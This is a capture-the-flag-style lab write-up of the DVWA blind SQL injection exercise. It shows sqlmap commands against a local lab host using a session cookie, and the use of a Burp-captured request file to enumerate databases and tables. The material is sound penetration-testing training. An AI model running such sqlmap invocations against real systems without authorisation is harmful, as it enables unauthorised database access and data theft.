# DVWA Exercises 6

### 13 Blind SQL Injection

In contrast to more regular SQL injections, a blind SQL injection can usually only be used to get **true/false** results. Since exfiltrating values this way will take hundreds or even thousands of requests, automated tools are often used. Some write their own, but most people use sqlmap. Fortunately, it has already been installed for you and is ready for use.

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2Fsd8fV3Cr0eZ3qfVPxCus%2Fblind_sql01.png?alt=media&#x26;token=14a5882b-02ac-4bbb-a8d4-48fbbd468dee" alt=""></div>

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FAWaumAVXtxUGspiA1sHm%2Fblind_sql02.png?alt=media&#x26;token=07edd9b5-f08e-462b-97b7-4280b0598440" alt=""></div>

Let's try sqlmap:

```
sqlmap --cookie='PHPSESSID=<your-session-id>' -u '<your-vulnerable-url>'
```

To find the session id cookie we can type `document.cookie` in the console:

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2Fb0cTR16VtFhqjrUMHTIx%2Fblind_sql03.png?alt=media&#x26;token=be5c87a6-28a4-4c08-9932-9ce4e5cfd33a" alt=""></div>

First I've tried to go ahead with the following parameters:

```
sqlmap -u "http://172.17.0.1/vulnerabilities/sqli_blind/" --cookie="PHPSESSID=37dpblqjrhknhc5pi08k916g21; security=low" --data="id=1&Submit=Submit" -p "id" --dbs --level=5 --risk=3
```

I didn't had success with this one. For some reasons it said the parameter id is not injectable!

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FRxCFoca5roJukGVOKpFz%2Fblind_sql04.png?alt=media&#x26;token=a95eefb8-c0ad-4a84-848f-052c0afa2533" alt=""></div>

Let's start burp and catching the get request when submitting a ID.

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FsU8aLVpVvZrAm1OTERBW%2Fblind_sql05.png?alt=media&#x26;token=b7530535-489c-4ff7-ba59-59df3c8e5848" alt=""></div>

In burp I'll modify the get request, set the parameter ?id=1 to ?id=1\* and save the whole request to a file.

```
sqlmap -r blind_sql --threads=10 -f --dbs --tables 
```

![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FcJ1Rhriw8T726css4Esk%2Fblind_sql06.png?alt=media\&token=f5b0698f-85a8-4f12-8ec6-10ef1c68b6d6)

![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2F28GdRiYJtPot4pYewJJl%2Fblind_sql07.png?alt=media\&token=4632d941-25a0-49b4-b062-189f24b8d59c)

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FL1e2R8QY6Va72MxIRk3b%2Fblind_sql08.png?alt=media&#x26;token=927339a2-9833-49d9-8d99-7d3ce81ea2ae" alt=""></div>